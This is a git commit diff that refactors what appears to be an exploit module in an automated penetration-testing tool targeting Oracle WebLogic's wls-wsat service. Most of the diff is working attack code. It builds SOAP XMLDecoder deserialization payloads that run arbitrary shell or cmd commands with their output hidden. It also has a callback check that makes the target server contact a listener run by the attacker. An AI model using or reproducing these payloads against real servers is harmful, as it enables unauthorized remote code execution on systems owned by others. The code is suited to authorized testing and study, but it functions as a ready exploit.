Notes fixed and tested

This commit is contained in:
Vakaris 2018-08-25 17:56:43 +03:00
parent 39bb41ed25
commit 307a7c396c
2 changed files with 77 additions and 67 deletions

View File

@ -191,7 +191,8 @@ class Configuration(object):
# TCP Scanner
HTTP_PORTS = [80, 8080, 443,
8008, 7001 # HTTP alternate
8008, # HTTP alternate
7001 # Oracle Weblogic default server port
]
tcp_target_ports = [22,
2222,

View File

@ -17,11 +17,11 @@ import logging
__author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
# How long server waits for get request
# How long server waits for get request in seconds
SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation
# How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15
URLS = ["/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
@ -55,6 +55,85 @@ class WebLogicExploiter(WebRCE):
return exploit_config
def exploit(self, url, command):
if 'linux' in self.host.os['type']:
payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
else:
payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
print('[!] Connection Error')
print(e)
return True
class IndicationHTTPServer(threading.Thread):
"""
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
"""
def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip
self._local_port = local_port
self.get_requests = 0
self.max_requests = max_requests
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
self.daemon = True
def run(self):
class S(BaseHTTPRequestHandler):
@staticmethod
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S)
httpd.daemon = True
self.lock.release()
while not self._stopped and self.get_requests < self.max_requests:
httpd.handle_request()
self._stopped = True
return httpd
def stop(self):
self._stopped = True
return
def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server()
payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error
pass
except Exception as e:
LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0
def _start_http_server(self):
lock = threading.Lock()
local_port = get_free_tcp_port()
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
lock.acquire()
httpd.start()
lock.acquire()
return httpd, lock
def _stop_http_server(self, httpd, lock):
lock.release()
httpd.join(SERVER_TIMEOUT)
httpd.stop()
return True
@staticmethod
def exploit_payload(cmd_base, cmd_opt, command):
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
@ -79,73 +158,17 @@ class WebLogicExploiter(WebRCE):
<soapenv:Body/>
</soapenv:Envelope>
'''
if 'linux' in self.host.os['type']:
cmd_base = '/bin/sh'
cmd_opt = '-c'
command += ' 1> /dev/null 2> /dev/null'
else:
cmd_base = 'cmd'
cmd_opt = '/c'
command += ' 1> NUL 2> NUL'
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
print('[!] Connection Error')
print(e)
return True
return payload
class HTTPServer(threading.Thread):
"""
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
"""
def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip
self._local_port = local_port
self.get_requests = 0
self.max_requests = max_requests
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
def run(self):
class S(BaseHTTPRequestHandler):
@staticmethod
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S)
httpd.daemon = True
self.lock.release()
while not self._stopped and self.get_requests < self.max_requests:
httpd.handle_request()
self._stopped = True
return httpd
def stop(self):
self._stopped = True
return
def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock
lock = threading.Lock()
local_port = get_free_tcp_port()
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
httpd.daemon = True
lock.acquire()
httpd.start()
lock.acquire()
def test_payload(ip, port):
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{lhost}:{lport}</string>
<string>http://{host}:{port}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
@ -156,19 +179,5 @@ class WebLogicExploiter(WebRCE):
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout:
pass
except Exception as e:
LOG.error("Something went wrong: %s" % e)
lock.release()
httpd.join(SERVER_TIMEOUT)
httpd.stop()
if httpd.get_requests > 0:
exploited = True
else:
exploited = False
return exploited
payload = generic_check_payload.format(host=ip, port=port)
return payload